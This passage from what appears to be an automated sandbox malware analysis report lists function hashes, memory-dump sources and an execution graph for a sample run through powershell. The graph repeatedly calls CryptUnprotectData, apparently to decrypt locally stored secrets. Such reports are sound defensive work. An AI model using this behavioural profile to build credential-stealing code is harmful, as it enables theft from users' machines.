                                            • Instruction Fuzzy Hash: CC31B3B4B00205AFCB68EF94C454A6EBBF2AF58714F148659E9156F758C731DD01CBD0
                                            Function 070AA470 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $^q$$^q$$^q$wl$wl
                                            • API String ID: 0-3213030559
                                            • Opcode ID: 18fb09a5353feeee5aa1b23dfac5177267bc5005c9315a114103f46fc159dc98
                                            • Instruction ID: 67c6080b48e108d9f1b0d9ce4a4c8056d50410ba6fde82f91508eeff79d27ba5
                                            • Opcode Fuzzy Hash: 18fb09a5353feeee5aa1b23dfac5177267bc5005c9315a114103f46fc159dc98
                                            • Instruction Fuzzy Hash: 4C11DAF130031AABDB7459AA9409B7AB7D6ABC5721F24C52AB5498B2C0DDB5C841C360
                                            Function 070AD588 Relevance: 5.5, Strings: 4, Instructions: 482COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (o^q$(o^q$(o^q$(o^q
                                            • API String ID: 0-1978863864
                                            • Opcode ID: 40ee1a63a92e65d9ed68676c836ea4d527335305985527a6359f225a2cfdf2db
                                            • Instruction ID: 251cc7767a157e54f6c59bc4f61947b525eb1946de27b9c244d83257f1bf579b
                                            • Opcode Fuzzy Hash: 40ee1a63a92e65d9ed68676c836ea4d527335305985527a6359f225a2cfdf2db
                                            • Instruction Fuzzy Hash: 90F16BB1708346EFCB548FA8C800BAA7BE2FFC5311F14866AE9558FA95DB31D845C760
                                            Function 070AEFB8 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: XRcq$XRcq$tP^q$$^q
                                            • API String ID: 0-3596674671
                                            • Opcode ID: fa726c5232cf173c2e05d4108dd33011d76e58685504f3cc9a0f39b570831222
                                            • Instruction ID: 5eb4761522a526418546a564970968f690710c1f0e62a3cf65c63f946fc8754d
                                            • Opcode Fuzzy Hash: fa726c5232cf173c2e05d4108dd33011d76e58685504f3cc9a0f39b570831222
                                            • Instruction Fuzzy Hash: C54192B0A00207EBCB64CF99C544EAAB7F2AF84715F65C2A9D915AB394C732FD41CB50
                                            Function 070AA800 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $^q$$^q$$^q$$^q
                                            • API String ID: 0-2125118731
                                            • Opcode ID: d7abe59a5a98ed5d17bfef5582cdc90b7ad9316cc4c8211c1936638807ea8d91
                                            • Instruction ID: 9c9267c15003755c4a5c3fb487613e8fd79ce3d95a266501c22e823363cfefa3
                                            • Opcode Fuzzy Hash: d7abe59a5a98ed5d17bfef5582cdc90b7ad9316cc4c8211c1936638807ea8d91
                                            • Instruction Fuzzy Hash: 252149F171030A7BDB7455AA8801B3B76D69BC1B11F20C52AA516CF3C5DD35D842C371
                                            Function 070A771D Relevance: 5.1, Strings: 4, Instructions: 82COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $^q$$^q$$^q$$^q
                                            • API String ID: 0-2125118731
                                            • Opcode ID: 1b4418c1e44a8210fdadd83bf479ee6f88ebecf6330a1d836790c2d7b6b4308b
                                            • Instruction ID: e04cd4298520958e87076c091a3cc5bbc16e5f2ce8f2d647c848ae1d8a90234d
                                            • Opcode Fuzzy Hash: 1b4418c1e44a8210fdadd83bf479ee6f88ebecf6330a1d836790c2d7b6b4308b
                                            • Instruction Fuzzy Hash: 3421B1B5A04246ABCB66CFE4C40066ABBF0BF82215F28D6AFD8458B205D7358549C7A2
                                            Function 070AA7E1 Relevance: 5.1, Strings: 4, Instructions: 80COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: _$$^q$$^q$$^q
                                            • API String ID: 0-2892113873
                                            • Opcode ID: 00e2b0efe675abe1b625ff01b7f020ecbdedec32e899a238b993bf5262ebf131
                                            • Instruction ID: 6856b2504e99544d185645c648f7fd3ffe2a12ba094511713261a10a43889fe0
                                            • Opcode Fuzzy Hash: 00e2b0efe675abe1b625ff01b7f020ecbdedec32e899a238b993bf5262ebf131
                                            • Instruction Fuzzy Hash: 6D2128F17083C66BEB625AB548007663FE14F83614F28C59BE5848F2D7D939C94AC372

                                            Execution Graph

                                            Execution Coverage:14.1%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:7.6%
                                            Total number of Nodes:92
                                            Total number of Limit Nodes:6
                                            execution_graph 44343 2042fa50 44344 2042fab8 CreateWindowExW 44343->44344 44346 2042fb74 44344->44346 44347 20424f70 44348 20424fb6 GetCurrentProcess 44347->44348 44350 20425001 44348->44350 44351 20425008 GetCurrentThread 44348->44351 44350->44351 44352 20425045 GetCurrentProcess 44351->44352 44353 2042503e 44351->44353 44354 2042507b 44352->44354 44353->44352 44355 204250a3 GetCurrentThreadId 44354->44355 44356 204250d4 44355->44356 44244 205144b8 44245 205144e0 44244->44245 44248 2051450c 44244->44248 44246 205144e9 44245->44246 44249 205139b4 44245->44249 44250 205139bf 44249->44250 44252 20514803 44250->44252 44253 205139d0 44250->44253 44252->44248 44254 20514838 OleInitialize 44253->44254 44255 2051489c 44254->44255 44255->44252 44357 204251b8 DuplicateHandle 44358 2042524e 44357->44358 44256 15ced8 44257 15cee4 44256->44257 44261 238285a0 44257->44261 44265 238285b0 44257->44265 44258 15d0b7 44263 238285d2 44261->44263 44262 23828a61 44262->44258 44263->44262 44269 23828e69 44263->44269 44267 238285d2 44265->44267 44266 23828a61 44266->44258 44267->44266 44268 23828e69 CryptUnprotectData 44267->44268 44268->44267 44270 23828e78 44269->44270 44273 238294e7 44270->44273 44274 23829503 44273->44274 44279 238294e7 CryptUnprotectData 44274->44279 44281 238296b3 44274->44281 44285 23829708 44274->44285 44275 23829591 44289 238291e0 44275->44289 44279->44275 44284 23829643 44281->44284 44282 238291e0 CryptUnprotectData 44283 2382975d 44282->44283 44283->44275 44284->44281 44284->44282 44286 23829725 44285->44286 44287 238291e0 CryptUnprotectData 44286->44287 44288 2382975d 44287->44288 44288->44275 44290 23829948 CryptUnprotectData 44289->44290 44291 23828ee8 44290->44291 44291->44263 44292 ad044 44293 ad05c 44292->44293 44294 ad0b6 44293->44294 44297 20510c48 44293->44297 44303 20510c38 44293->44303 44298 20510c75 44297->44298 44299 20510ca7 44298->44299 44309 20510dc1 44298->44309 44314 20510e9c 44298->44314 44320 20510dd0 44298->44320 44299->44299 44304 20510c75 44303->44304 44305 20510ca7 44304->44305 44306 20510dc1 2 API calls 44304->44306 44307 20510dd0 2 API calls 44304->44307 44308 20510e9c 2 API calls 44304->44308 44306->44305 44307->44305 44308->44305 44310 20510de4 44309->44310 44325 20510e77 44310->44325 44328 20510e88 44310->44328 44311 20510e70 44311->44299 44315 20510e5a 44314->44315 44316 20510eaa 44314->44316 44318 20510e77 2 API calls 44315->44318 44319 20510e88 2 API calls 44315->44319 44317 20510e70 44317->44299 44318->44317 44319->44317 44322 20510de4 44320->44322 44321 20510e70 44321->44299 44323 20510e77 2 API calls 44322->44323 44324 20510e88 2 API calls 44322->44324 44323->44321 44324->44321 44326 20510e99 44325->44326 44331 205122d0 44325->44331 44326->44311 44329 20510e99 44328->44329 44330 205122d0 2 API calls 44328->44330 44329->44311 44330->44329 44335 205122f0 44331->44335 44339 205122e2 44331->44339 44332 205122da 44332->44326 44336 20512332 44335->44336 44338 20512339 44335->44338 44337 2051238a CallWindowProcW 44336->44337 44336->44338 44337->44338 44338->44332 44340 20512332 44339->44340 44342 20512339 44339->44342 44341 2051238a CallWindowProcW 44340->44341 44340->44342 44341->44342 44342->44332

                                            Executed Functions

                                            Function 00156730 Relevance: 6.7, Strings: 5, Instructions: 467COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1038 156730-156766 1039 15676e-156774 1038->1039 1169 156768 call 156730 1038->1169 1170 156768 call 156880 1038->1170 1171 156768 call 156108 1038->1171 1040 1567c4-1567c8 1039->1040 1041 156776-15677a 1039->1041 1044 1567df-1567f3 1040->1044 1045 1567ca-1567d9 1040->1045 1042 15677c-156781 1041->1042 1043 156789-156790 1041->1043 1042->1043 1046 156866-1568a3 1043->1046 1047 156796-15679d 1043->1047 1050 1567fb-156802 1044->1050 1166 1567f5 call 159851 1044->1166 1167 1567f5 call 159858 1044->1167 1048 156805-15680f 1045->1048 1049 1567db-1567dd 1045->1049 1059 1568a5-1568ab 1046->1059 1060 1568ae-1568ce 1046->1060 1047->1040 1053 15679f-1567a3 1047->1053 1051 156811-156817 1048->1051 1052 156819-15681d 1048->1052 1049->1050 1055 156825-15685f 1051->1055 1052->1055 1056 15681f 1052->1056 1057 1567a5-1567aa 1053->1057 1058 1567b2-1567b9 1053->1058 1055->1046 1056->1055 1057->1058 1058->1046 1061 1567bf-1567c2 1058->1061 1059->1060 1066 1568d5-1568dc 1060->1066 1067 1568d0 1060->1067 1061->1050 1070 1568de-1568e9 1066->1070 1069 156c64-156c6d 1067->1069 1071 156c75-156cb1 1070->1071 1072 1568ef-156902 1070->1072 1081 156cb3-156cb8 1071->1081 1082 156cba-156cbe 1071->1082 1077 156904-156912 1072->1077 1078 156918-156933 1072->1078 1077->1078 1084 156bec-156bf3 1077->1084 1086 156935-15693b 1078->1086 1087 156957-15695a 1078->1087 1085 156cc4-156cc5 1081->1085 1082->1085 1084->1069 1090 156bf5-156bf7 1084->1090 1088 156944-156947 1086->1088 1089 15693d 1086->1089 1091 156ab4-156aba 1087->1091 1092 156960-156963 1087->1092 1094 15697a-156980 1088->1094 1095 156949-15694c 1088->1095 1089->1088 1089->1091 1093 156ba6-156ba9 1089->1093 1089->1094 1096 156c06-156c0c 1090->1096 1097 156bf9-156bfe 1090->1097 1091->1093 1098 156ac0-156ac5 1091->1098 1092->1091 1099 156969-15696f 1092->1099 1104 156c70 1093->1104 1105 156baf-156bb5 1093->1105 1106 156986-156988 1094->1106 1107 156982-156984 1094->1107 1100 1569e6-1569ec 1095->1100 1101 156952 1095->1101 1096->1071 1102 156c0e-156c13 1096->1102 1097->1096 1098->1093 1099->1091 1103 156975 1099->1103 1100->1093 1113 1569f2-1569f8 1100->1113 1101->1093 1111 156c15-156c1a 1102->1111 1112 156c58-156c5b 1102->1112 1103->1093 1104->1071 1108 156bb7-156bbf 1105->1108 1109 156bda-156bde 1105->1109 1110 156992-15699b 1106->1110 1107->1110 1108->1071 1116 156bc5-156bd4 1108->1116 1109->1084 1119 156be0-156be6 1109->1119 1117 15699d-1569a8 1110->1117 1118 1569ae-1569d6 1110->1118 1111->1104 1121 156c1c 1111->1121 1112->1104 1120 156c5d-156c62 1112->1120 1114 1569fe-156a00 1113->1114 1115 1569fa-1569fc 1113->1115 1122 156a0a-156a21 1114->1122 1115->1122 1116->1078 1116->1109 1117->1093 1117->1118 1141 1569dc-1569e1 1118->1141 1142 156aca-156b00 1118->1142 1119->1070 1119->1084 1120->1069 1120->1090 1123 156c23-156c28 1121->1123 1134 156a23-156a3c 1122->1134 1135 156a4c-156a73 1122->1135 1124 156c4a-156c4c 1123->1124 1125 156c2a-156c2c 1123->1125 1124->1104 1132 156c4e-156c51 1124->1132 1129 156c2e-156c33 1125->1129 1130 156c3b-156c41 1125->1130 1129->1130 1130->1071 1133 156c43-156c48 1130->1133 1132->1112 1133->1124 1137 156c1e-156c21 1133->1137 1134->1142 1146 156a42-156a47 1134->1146 1135->1104 1145 156a79-156a7c 1135->1145 1137->1104 1137->1123 1141->1142 1149 156b02-156b06 1142->1149 1150 156b0d-156b15 1142->1150 1145->1104 1148 156a82-156aab 1145->1148 1146->1142 1148->1142 1165 156aad-156ab2 1148->1165 1151 156b25-156b29 1149->1151 1152 156b08-156b0b 1149->1152 1150->1104 1153 156b1b-156b20 1150->1153 1154 156b48-156b4c 1151->1154 1155 156b2b-156b31 1151->1155 1152->1150 1152->1151 1153->1093 1158 156b56-156b75 call 156e58 1154->1158 1159 156b4e-156b54 1154->1159 1155->1154 1157 156b33-156b3b 1155->1157 1157->1104 1160 156b41-156b46 1157->1160 1162 156b7b-156b7f 1158->1162 1159->1158 1159->1162 1160->1093 1162->1093 1163 156b81-156b9d 1162->1163 1163->1093 1165->1142 1166->1050 1167->1050 1169->1039 1170->1039 1171->1039
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                            • API String ID: 0-2525668591
                                            • Opcode ID: 6482cdca5bf41ef1bffff85c5f8c381cd335dfde366c5e71053abf4a7332386e
                                            • Instruction ID: 09011f8ecb7322946b40815238615867cc036528cf2b81750895d69981b75c1e
                                            • Opcode Fuzzy Hash: 6482cdca5bf41ef1bffff85c5f8c381cd335dfde366c5e71053abf4a7332386e
                                            • Instruction Fuzzy Hash: 69125170A00209DFCB15CF69C984AADBBF2FF48306F558069E865EB261D734DD89CB91
                                            Function 20CB3288 Relevance: 4.3, Strings: 1, Instructions: 3069COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: N
                                            • API String ID: 0-1130791706
                                            • Opcode ID: e5fd052b54f6b56ef2fcc0d914e2a5f9c9b721c7fc192720b72b1cfe933047f9
                                            • Instruction ID: 9d6fafee579541cec43b3da29d202778083db766e507ec1c2ba11289d303bb07
                                            • Opcode Fuzzy Hash: e5fd052b54f6b56ef2fcc0d914e2a5f9c9b721c7fc192720b72b1cfe933047f9
                                            • Instruction Fuzzy Hash: CF73E771D107598ECB11EFA8C854A99F7B1FF99300F11D69AE4587B221EB70AAC4CF81
                                            Function 00159858 Relevance: 3.4, Strings: 2, Instructions: 860COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (o^q$4'^q
                                            • API String ID: 0-273632683
                                            • Opcode ID: 7b7d3e4c129666704dcb0311dd9be8ef2d5db1a579cdb8b93a4fe40d20566fbb
                                            • Instruction ID: 7324f73e0d58ea215ff69e2dec571138fdd6e6e358e3af6a61e347e4a3cf448d
                                            • Opcode Fuzzy Hash: 7b7d3e4c129666704dcb0311dd9be8ef2d5db1a579cdb8b93a4fe40d20566fbb
                                            • Instruction Fuzzy Hash: 0B728370A00609DFCB15CF64C994AAEBBF2FF88302F558559E8169F2A1D730ED85CB52
                                            Function 00156108 Relevance: 3.0, Strings: 2, Instructions: 513COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (o^q$Hbq
                                            • API String ID: 0-662517225
                                            • Opcode ID: 257c8518107272f1bc13f093e8aab48e8932c01c9801a8e0839203d98a5feb76
                                            • Instruction ID: 28cdd6498ab4c637426950f17c50101a9f8c816af2916fb94fd1972dfa58a903
                                            • Opcode Fuzzy Hash: 257c8518107272f1bc13f093e8aab48e8932c01c9801a8e0839203d98a5feb76
                                            • Instruction Fuzzy Hash: 96128F70A00218CFDB14DF69C854AAEBBF2BF88305F648569E919DB391DF349D85CB90
                                            Function 0015B328 Relevance: 2.9, Strings: 2, Instructions: 356COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2987 15b328-15b33b 2988 15b341-15b34a 2987->2988 2989 15b47a-15b481 2987->2989 2990 15b484 2988->2990 2991 15b350-15b354 2988->2991 2994 15b489-15b491 2990->2994 2992 15b356 2991->2992 2993 15b36e-15b375 2991->2993 2995 15b359-15b364 2992->2995 2993->2989 2996 15b37b-15b388 2993->2996 3000 15b493-15b4ab 2994->3000 3001 15b4ac-15b4b0 2994->3001 2995->2990 2997 15b36a-15b36c 2995->2997 2996->2989 3002 15b38e-15b3a1 2996->3002 2997->2993 2997->2995 3000->3001 3003 15b4b2-15b4ca 3001->3003 3004 15b4dc 3001->3004 3005 15b3a6-15b3ae 3002->3005 3006 15b3a3 3002->3006 3018 15b4d3-15b4d6 3003->3018 3019 15b4cc-15b4d1 3003->3019 3009 15b4de-15b4e2 3004->3009 3007 15b3b0-15b3b6 3005->3007 3008 15b41b-15b41d 3005->3008 3006->3005 3007->3008 3011 15b3b8-15b3be 3007->3011 3008->2989 3010 15b41f-15b425 3008->3010 3010->2989 3013 15b427-15b431 3010->3013 3011->2994 3014 15b3c4-15b3dc 3011->3014 3013->2994 3015 15b433-15b44b 3013->3015 3026 15b3de-15b3e4 3014->3026 3027 15b409-15b40c 3014->3027 3030 15b470-15b473 3015->3030 3031 15b44d-15b453 3015->3031 3020 15b4e3-15b4f9 3018->3020 3021 15b4d8-15b4da 3018->3021 3019->3009 3028 15b514-15b520 3020->3028 3029 15b4fb-15b510 3020->3029 3021->3003 3021->3004 3026->2994 3032 15b3ea-15b3fe 3026->3032 3027->2990 3033 15b40e-15b411 3027->3033 3034 15b527-15b604 call 153908 call 153428 3028->3034 3035 15b522 3028->3035 3029->3028 3030->2990 3037 15b475-15b478 3030->3037 3031->2994 3036 15b455-15b469 3031->3036 3032->2994 3041 15b404 3032->3041 3033->2990 3038 15b413-15b419 3033->3038 3052 15b606 3034->3052 3053 15b60b-15b62c call 154dc8 3034->3053 3035->3034 3036->2994 3043 15b46b 3036->3043 3037->2989 3037->3013 3038->3007 3038->3008 3041->3027 3043->3030 3052->3053 3055 15b631-15b63c 3053->3055 3056 15b643-15b647 3055->3056 3057 15b63e 3055->3057 3058 15b64c-15b653 3056->3058 3059 15b649-15b64a 3056->3059 3057->3056 3061 15b655 3058->3061 3062 15b65a-15b668 3058->3062 3060 15b66b-15b6af 3059->3060 3066 15b715-15b72c 3060->3066 3061->3062 3062->3060 3068 15b6b1-15b6c7 3066->3068 3069 15b72e-15b753 3066->3069 3072 15b6f1 3068->3072 3073 15b6c9-15b6d5 3068->3073 3075 15b755-15b76a 3069->3075 3076 15b76b 3069->3076 3079 15b6f7-15b714 3072->3079 3077 15b6d7-15b6dd 3073->3077 3078 15b6df-15b6e5 3073->3078 3075->3076 3080 15b6ef 3077->3080 3078->3080 3079->3066 3080->3079
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q$PH^q
                                            • API String ID: 0-1598597984
                                            • Opcode ID: d48707bdbad8615f1b035653708f0c29367bfc1f1aed49f5ee44e9a6b97a3d63
                                            • Instruction ID: 9d654353ad05e403930f513d3ba7d609563094bbaf8b3021798c6067fef58447
                                            • Opcode Fuzzy Hash: d48707bdbad8615f1b035653708f0c29367bfc1f1aed49f5ee44e9a6b97a3d63
                                            • Instruction Fuzzy Hash: D8E1F874E04258CFDB14CFA9C894A9DBBB2FF49311F1580A9E819AB362DB30AC45CF50
                                            Function 0015BBBA Relevance: 2.7, Strings: 2, Instructions: 202COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q$PH^q
                                            • API String ID: 0-1598597984
                                            • Opcode ID: cbe4d28d79c9c853b25e123f2b732523c35acd3779111db874db03536ea45b04
                                            • Instruction ID: b2ad076156a388e473caacbe93b7a44f787e2b0ca76371cd7532211abc640623
                                            • Opcode Fuzzy Hash: cbe4d28d79c9c853b25e123f2b732523c35acd3779111db874db03536ea45b04
                                            • Instruction Fuzzy Hash: 6291F670E04258CFDB18CFA9D894A9DBBF2BF89305F14806AE858AB365DB345D49CF10
                                            Function 0015C754 Relevance: 2.7, Strings: 2, Instructions: 192COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q$PH^q
                                            • API String ID: 0-1598597984
                                            • Opcode ID: 102e2306d014825a4a4227cd7a0f305caefe45d55a158128e84d7ff90e20f3eb
                                            • Instruction ID: 8f55ac8190af56864189040e0b647ef14df6a81177654a114cb269a912e1ccef
                                            • Opcode Fuzzy Hash: 102e2306d014825a4a4227cd7a0f305caefe45d55a158128e84d7ff90e20f3eb
                                            • Instruction Fuzzy Hash: D381C474E00218CFDB18DFAAD894A9DBBF2BF89301F14C069E819AB365DB349945CF50
                                            Function 00154AD9 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q$PH^q
                                            • API String ID: 0-1598597984
                                            • Opcode ID: 4d93669a50b7bebf316b21c803bdcb21fb71aafbaa9ab48a4d8ea1ee260edec7
                                            • Instruction ID: 218bf028cccb196f02dff2d626c412a8f05e4d94265cc5362bb96b719b82745e
                                            • Opcode Fuzzy Hash: 4d93669a50b7bebf316b21c803bdcb21fb71aafbaa9ab48a4d8ea1ee260edec7
                                            • Instruction Fuzzy Hash: 6A81C374E01218CFDB18DFAAD884A9DBBF2BF89305F14C069E819AB365DB345985CF10
                                            Function 0015C473 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q$PH^q
                                            • API String ID: 0-1598597984
                                            • Opcode ID: e7b02b8c1e7fa7a2bcbe57be7068ca7ba759de4946be79bca73f67abbd47eb56
                                            • Instruction ID: 63834db4a3730d7b5379dae2078813c3f9a0ea090cc364d2378e4f1ec109e809
                                            • Opcode Fuzzy Hash: e7b02b8c1e7fa7a2bcbe57be7068ca7ba759de4946be79bca73f67abbd47eb56
                                            • Instruction Fuzzy Hash: 8481C3B4E00218CFDB18DFAAC884A9DBBF2BF89301F14D069E819AB365DB345945CF50
                                            Function 0015CA34 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q$PH^q
                                            • API String ID: 0-1598597984
                                            • Opcode ID: d686696c58d768a083dff665dce3f8c51848e8f8652010326945aec3d19b8ea0
                                            • Instruction ID: afa1cff05b622dd21b4e49af78c23ff9f1cc3051559895765f600a5e646ee707
                                            • Opcode Fuzzy Hash: d686696c58d768a083dff665dce3f8c51848e8f8652010326945aec3d19b8ea0
                                            • Instruction Fuzzy Hash: 8881C374E00218CFDB18DFAAD994A9DBBF2BF89301F14C069E819AB361DB345945CF50
                                            Function 0015C190 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q$PH^q
                                            • API String ID: 0-1598597984
                                            • Opcode ID: 036bd9411ed3a05b3aa9f74734e62392ab1b819253669a14045aaaf1ebbee61a
                                            • Instruction ID: 2cdd1980b7deef28ddd306b99c1118f95dc06b9186a17c01842abcd2d0ea5255
                                            • Opcode Fuzzy Hash: 036bd9411ed3a05b3aa9f74734e62392ab1b819253669a14045aaaf1ebbee61a
                                            • Instruction Fuzzy Hash: C081C574E00218CFDB58DFAAD894A9DBBF2BF89301F14C069E819AB365DB349945CF50
                                            Function 0015BEB7 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q$PH^q
                                            • API String ID: 0-1598597984
                                            • Opcode ID: 913240fe90f2ee512917042caca4c48ee9c6172297b236fed87c963ac7432a3e
                                            • Instruction ID: ce2b597aca092640db6e5f779f3c450778f512631c00db342ab86942282eb232
                                            • Opcode Fuzzy Hash: 913240fe90f2ee512917042caca4c48ee9c6172297b236fed87c963ac7432a3e
                                            • Instruction Fuzzy Hash: 3181B574E00218CFDB18DFAAD994A9DBBF2BF89301F14C06AE819AB365DB345945CF50
                                            Function 238291E0 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 238299AD
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID: CryptDataUnprotect
                                            • String ID:
                                            • API String ID: 834300711-0
                                            • Opcode ID: 4cb8e1ed969cbddcdeb91e461920957b13ca405aee8053d11f67997e266e4898
                                            • Instruction ID: f17757b4a4628def6b882220b63003fb20c1162c623770b2c4a66f7640e23fa8
                                            • Opcode Fuzzy Hash: 4cb8e1ed969cbddcdeb91e461920957b13ca405aee8053d11f67997e266e4898
                                            • Instruction Fuzzy Hash: 3A1156B2800349DFCB10DF9AC945BDEBFF4EB48320F148459EA18A7210C335A9A0DFA5
                                            Function 23829941 Relevance: 1.6, APIs: 1, Instructions: 54encryptionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 238299AD
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
